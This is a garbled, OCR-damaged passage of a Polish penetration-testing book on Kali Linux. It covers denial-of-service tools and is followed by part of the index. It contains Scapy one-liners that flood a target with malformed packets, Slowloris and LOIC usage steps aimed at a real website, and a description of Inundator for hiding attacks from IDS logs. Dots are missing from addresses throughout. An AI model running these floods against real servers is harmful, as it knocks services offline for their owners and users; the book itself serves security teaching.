Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

